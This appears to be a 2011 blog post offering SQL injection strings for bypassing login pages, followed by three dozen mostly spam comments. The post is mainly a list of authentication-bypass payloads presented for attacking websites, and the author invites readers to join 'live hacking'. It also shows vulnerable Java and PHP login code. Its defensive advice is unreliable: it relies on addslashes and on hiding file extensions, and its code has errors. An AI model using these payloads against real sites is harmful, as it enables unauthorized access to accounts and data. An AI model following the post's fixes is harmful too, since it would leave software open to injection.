Monday, September 5, 2011

SQL injection strings for Hack Any Login Page




Here I am posting some of the SQL injection strings that you can use to hack into the website.
I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.
If someone is pro of breaking into venerable systems and sites. please share your expriences/
‘ or 0=0 –
‘ or 0=0 –’
‘ or 0=0 #
” or 0=0 –
” or 0=0 –’
‘” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
” or 1=1–
or 1=1–
‘ or a=a–’
‘ or a=a #
‘ or a=a–
‘ or “a”=”a
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
admin’–
‘ or 1=1–
‘” or 1=1–
‘ union select 1, ‘Eyeless’, ‘ez2do’, 1–
admin’–
administrator’–
superuser’–
test’–
This is the short list but these SQL injection strings are much powerful.
I have another hint :
Some of the SQL supporting system doesn’t support.
For example
” or “a”=”a
‘) or (‘a’='a
on some databases one would work, other wouldn’t.. first one would enclose the username (or pass) in quotes… first it would CLOSE the quotes (making it “”) and then says.. or “a”=”a.. the last quote would be closeing the final a.. and “a”=”a” is always true, so that would be how it works
however, the second uses (‘Username’).. and changing it to say “(”) or (‘a’='a’)”
Enjoy the HACK DAY :)

SQL Injection like this 

Login Java Code

String userid = request.getParameter("userid");
String password = request.getParameter("password");
Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
connection = DriverManager.getConnection("jdbc:odbc:projectDB");

query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password +"'";

PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();

if(users.next()){

//some thing here
}
else{

}
Injection Works like this
query = "SELECT * FROM Users WHERE user_id ='' OR 1=1; /* AND password ='*/--'";

Login PHP Code;
Username = ' OR 1=1;//
Password = ....
$myusername=$_POST['usr'];
$mypassword=$_POST['pwd'];

$sql="SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";

$result=mysql_query($sql);
$count=mysql_num_rows($result);

if($count==1){

//some code
}
else {

}
Injection Works like this
$sql="SELECT * FROM users WHERE user=''OR 1 = 1;//' and password='....'";

How to avoid these mistakes Use addSlashes() function adding slashes(/) to the string in java and php

//Java Code
addSlashes(String userid);

// PHP Code
$myusername=addslashes($_POST['usr'];);
Hacker is intelligent than programmer. So always hide the file extension (eg: *.jsp,*.php,*.asp).

http://xyz.com/login.php to http://xyz.com/login
http://xyz.com/login to http://xyz.com/signin.do
In Java redirect this URL links using Web.xml file and inn php write .htaccess file in root directory.


By Kaila Piyush
My Google Profile
HackingArticles4all.blogspot.com

36 comments:

  1. These are actually wonderful ideas in on the topic of blogging.
    You have touched some fastidious things here. Any way keep up wrinting.


    Look into my blog post hack twitter

    ReplyDelete
  2. What's up, its good piece of writing concerning media print, we all be aware of media is a enormous source of data.

    Feel free to visit my web blog - sharecash downloader 2013

    ReplyDelete
  3. What i don't realize is in fact how you're not actually much more well-preferred than you
    might be now. You're so intelligent. You realize thus significantly relating to this matter, made me individually imagine it from a lot of various angles. Its like men and women aren't involved except it's one thing to accomplish with Lady gaga! Your personal stuffs great. All the time maintain it up!

    Have a look at my blog post: windows password recovery tool

    ReplyDelete
  4. Hi there! This is my first comment here so I just wanted to give a quick shout out and say I
    truly enjoy reading through your articles. Can you suggest any other blogs/websites/forums that cover the same subjects?
    Appreciate it!

    Visit my website - lady gaga tour 2012

    ReplyDelete
  5. whoah this blog is wonderful i really like reading your posts.
    Keep up the great work! You already know, many individuals are hunting around for this information, you
    could help them greatly.

    Here is my page - Dubstep

    ReplyDelete
  6. Excellent post. Keep writing such kind of information on your blog.

    Im really impressed by it.
    Hello there, You've done an excellent job. I'll certainly digg it and in my opinion suggest
    to my friends. I am sure they'll be benefited from this site.

    Look into my site :: Twitter password

    ReplyDelete
  7. Admiring the time and effort you put into your site
    and in depth information you present. It's good to come across a blog every once in a while that isn't the same unwanted rehashed material.
    Fantastic read! I've saved your site and I'm adding
    your RSS feeds to my Google account.

    Here is my webpage - funny drawings pictures

    ReplyDelete
  8. These are really impressive ideas in on the
    topic of blogging. You have touched some good points here.
    Any way keep up wrinting.

    Feel free to surf to my webpage Funny cartoon cat pictures

    ReplyDelete
  9. When we choose to do the opposite of nothing, then
    we can do something to help others and make a difference.
    Leveling up to defeat all the enemies can be time arresting so apprehend
    to absorb a acceptable bulk of hours anniversary day accepting the a lot of out of this game.
    In addition, you can save the effort of coding the store functionality, virtual goods dependencies, billing interfaces and rewards.


    my web-site: port saint lucie florida

    ReplyDelete
  10. She loves to share hers positive and negative experiences, and staying at , booked through chilloutbali.

    If you own a Black - Berry 9550 Storm 2, Black - Berry Curve 8530,
    Black - Berry Tour 9630, Black - Berry Storm 9530, Black - Berry Curve 8330, Black - Berry World 8830, Black - Berry Pearl Flip 8230,
    or Black - Berry Pearl Flip 8130, then you can listen to nearly a thousand songs on a single
    micro - SD card. We are literally not the same person we were a minute ago, let alone a day, a month or a year ago.


    My page - chillout - toryybhpejh.skyrock.com

    ReplyDelete
  11. If with the classic version, you only get to play the same game over and over again, with Simon 2 game, you
    get to play more games with more challenges ad game highlights.
    By obtaining increasingly more favour using their company people in your social settings, the more handle
    you will need to acquire what you would like, and thru The particular Coalition Game you have just about
    the most effective tips for hypnotherapy that gives you the talent to ensure that you influence other folks.

    Online gaming is a popular way to spend enjoyable time at a low cost for hours on end.


    Take a look at my blog http://oedady.com/url/profile/Katrina02

    ReplyDelete
  12. They want to win by playing their very best as opposed to winning by putting the other person off.
    Just last year Apple sold more than one hundred million i - Phone
    and i - Pad apps. You can only acquire a small amount of in-game money or gold,
    and cannot participate in the auction house, send mail, join guilds, or even whisper to someone unless someone whispers to you first.


    Also visit my webpage; long beach condominiums

    ReplyDelete
  13. After a long hectic busy day, games plays an important role to relax frayed nerves, scorched eyes
    and tired ears. No two classes are created equally in
    World of Warcraft and Zygors leveling guide will
    pinpoint the most suitable build type and questing route based upon the class
    you're playing. In the game, players should be able to able to make use of a slingshot in order to start the birds.

    Here is my web site - spiele spielen

    ReplyDelete
  14. If you are receiving a fatal exception error message or BSOD with error message while installing or playing Real - Arcade
    games, take note of the stop error code and then temporary disable
    avast or turn on Gaming or Silent mode in
    the Avast progr am. No two classes are created equally in World of Warcraft and Zygors leveling guide
    will pinpoint the most suitable build type and questing route based upon the class you're playing. In the game, players should be able to able to make use of a slingshot in order to start the birds.

    Also visit my blog post http://naturaltalented.wordpress.com/2013/05/02/but-there-are-also-online-arcade-games-for-kids-puzzle-games-for-kids-free-online-trivia-games-and-more/

    ReplyDelete
  15. Both drugs have also been denied FDA approval the first
    time around and are awaiting news on their second attempt.

    In fact, I always suggest to those overweight vegetarians to keep to a max of 4 pounds
    a week so you won't suffer loose skin post weight loss. Many people don't have the time to weight themselves
    every day, but checking the scale on a regular basis can definitely help when you're working to lose weight and keep it off.

    Take a look at my web-site www.fathvereniging.nl

    ReplyDelete
  16. In most cases they are, but when it comes to updates, patches, etc to the mmorpgs.
    While having a passion for playing games is important, getting a rewarding career in game design will require students to be a cut
    above the competition. It is recommended that
    the golfers select those putters with which the golfers feel good and works well with their gaming pattern.


    Also visit my page - Visitar Site

    ReplyDelete
  17. The WWE Wrestle - Mania 29 live stream online and televised Pay-Per-View arrives to the
    pro wrestling world on Sunday, April 7, with plenty of big name stars in the matches.
    There is little censorship and any one can put up anything almost on the site as
    long as it is legal and could be viewed by adults of a legal
    age. These videos might be personal, songs, motion picture scenes, training videos and so forth.


    Here is my web-site - http://youtube-views-kaufen.de/

    ReplyDelete
  18. This is more important than ever in a world where there are dozens
    of different audio formats. Hardware mechanisms used
    in the manufacturing of a Wi - Fi internet radio system is less complicated and the point of ergonomics is kept in mind by the manufactures.

    Another radio commercial production tip to
    chew on is to make sure the audio quality is excellent on
    any spot your produce.

    Also visit my webpage xm radio onyx docking station

    ReplyDelete
  19. If, at the end of this time period, the score is
    tied, there are two options the officials can
    take. By obtaining increasingly more favour using their company people in your social settings, the more handle you will need to acquire what you would like, and
    thru The particular Coalition Game you have
    just about the most effective tips for hypnotherapy that gives you the talent to
    ensure that you influence other folks. Most video game testers reported that their salary
    falls between $15,000 and $55, 000 in a year.

    Feel free to surf to my site :: bgvideo.com

    ReplyDelete
  20. If it is lower the Studio365 will tell you and let you know that it will not sound well.
    Unlike broadcast radio which is an audio-only medium, Internet radio stations
    are free to offer interactive programming and can include images,
    animation, and even video. They explained how banners
    are bought via a network so they get low CPMs, an obscene amount of views and a good click-through ratio.


    Have a look at my blog :: www.crisisenergetica.org

    ReplyDelete
  21. She is likely a WARRIOR PERSONALITY I talk about in the KWML Mastery Course
    on women, dating, love, and friendship. This way you are not disappointed when you get residence,
    and you won't have to make a excursion back to the shop. It fizzles as the lights go out, and she says it's been great talking to
    you.

    Look at my web blog; mouse click the up coming website page

    ReplyDelete
  22. Both drugs have also been denied FDA approval the first time around and are awaiting news on their second attempt.
    Vitamin B3 or also called as Niacin is important in weight loss because it is responsible for the regulation of thyroid hormones and also in sugar levels in the
    body. The institution has persistently offered ideal
    programs and services for those struggling to achieve certain levels of body weight.


    Feel free to surf to my homepage: http://www.5-10kgabnehmen.de

    ReplyDelete
  23. If you find it a bit maddening to follow the daily fluctuations of the scale even though you are eating
    properly, pick three days of the week on which you will always weigh yourself (for example, Monday,
    Wednesday, and Friday). Anyone who dares to make a closer inspection will find
    the underlying difference. Do not be tempted to lose weight as quickly as you can, because a crash diet will have you eating less than
    a thousand calories a day slowing down your metabolism.


    Also visit my web blog - http://economyinsight.co.kr/news/articleView.html?idxno=219

    ReplyDelete
  24. Wallace explained the importance of nature by explaining the relationship between the Man and Nature.
    Once she moved 1931 to Krakow with her family, she lived and
    worked there since her death in February of last year. Wedding poetry can be used
    during wedding toasts, and if you find the right balance, it can make a big difference.


    My web blog; http://northerncalifornia.dirtdujour.com/member/65119

    ReplyDelete
  25. A little bit of care, concern and love will go a long way to make him feel bound
    with you. These are reaching thousands of people at a time who recognize the self help benefits and pass them on to friends
    who do the same and they become viral. There are many famous author
    books published on poems.

    ReplyDelete
  26. If you cannot write love poems for your guy, don't be disappointed easily. From ancient Britain come romantic love poems of forbiddin trysts in black forests and aristocratic romance between knights and fair maidens. Remember fall in love poems should say the exact thing you feel without hesitation and fear of being embarrassed, either you write fall in love poems yourself or choose from the famous fall in love poems.

    ReplyDelete
  27. Though the levels look really simple, they are actually
    quite challenging. It is an adventurous game filled with fun and excitement.

    You can only acquire a small amount of in-game money or gold, and cannot
    participate in the auction house, send mail, join guilds, or even whisper to someone unless
    someone whispers to you first.

    Also visit my weblog www.sosd.org

    ReplyDelete
  28. Generally I don't read post on blogs, but I would like to say that this write-up very compelled me to try and do so! Your writing taste has been surprised me. Thank you, very nice article.

    My webpage: twitter password

    ReplyDelete
  29. (Game scheduled for December 15th with Utah State playing Toledo).

    Understanding video gaming is a must tip on how to run a game store.
    In addition, you can save the effort of coding the store functionality, virtual goods dependencies, billing interfaces and
    rewards.

    Take a look at my weblog ... www chasebank com **

    ReplyDelete
  30. Oh I see! I thought you haԁ this down аs an optional
    foοliѕh addіtion.

    Here is my website :: personal loans uk

    ReplyDelete
  31. In other trick taking games, players can take tricks on a number of kind of
    contract. The player who spins the coin is referred to as the spinner.
    It sounds like you log into the game and join a "Shadow war"
    server and play with hundreds of other players within that PVP
    world, but that world is different from the cooperative
    Arkfall boss hunting world.

    Here is my web blog; click through the next website

    ReplyDelete
  32. I cover my freshly sharpened hook with paste and coat the hair and bait in paste.
    Here is some helpful information so you can select a good charter boat and avoid a few of the pitfalls.
    When the water arrives at the inlet, most oxygen
    is dissolved because of the abrupt transformation of water
    movement.

    My site: http://www.Nvcc.com

    ReplyDelete
  33. clients, Rachel, who got back together with her ex.

    All spaceship game leveling systems are designed slightly differently, but there are some general concepts that
    apply to all games in this genre. For the purposes of this game, a "set" is
    at least three cards of equal value such as three Jacks or three fours and a "sequence"
    is made up of at least four cards that are of the same
    suit and run sequentially such as three, four, five, and
    six of spades.

    Visit my web site ... click the up coming site

    ReplyDelete
  34. Break your 3 normal main meals into 5 smaller portion sizes - morning, snack,
    lunch, snack, dinner. Withdrawal from levothyroxine can be done but it takes 6 weeks of withdrawal for the remaining
    thyroid tissue to be completely starved. Many people don't have the time to weight themselves every day, but checking the scale on a regular basis can definitely help when you're working to lose weight and
    keep it off.

    My blog post ... http://www.forumhertfordshire.co.uk/index.
    php/member/399/ []

    ReplyDelete
  35. The same test can be performed while on the shower. From ancient Britain come romantic love poems of forbiddin trysts in black
    forests and aristocratic romance between knights and fair maidens.
    However, believe it or not poems () about getting back together
    actually can be quite powerful when attracting your ex back into your life.

    ReplyDelete
  36. Both drugs have also been denied FDA approval the first time around and are awaiting news on
    their second attempt. It’s old news that tracking food intake
    could lead to losing a few pounds [2]. Who does not need that little
    bit of elevation when trying to diet.

    My webpage simply click the following web site ()

    ReplyDelete

You might also like....

Related Posts Plugin for WordPress, Blogger...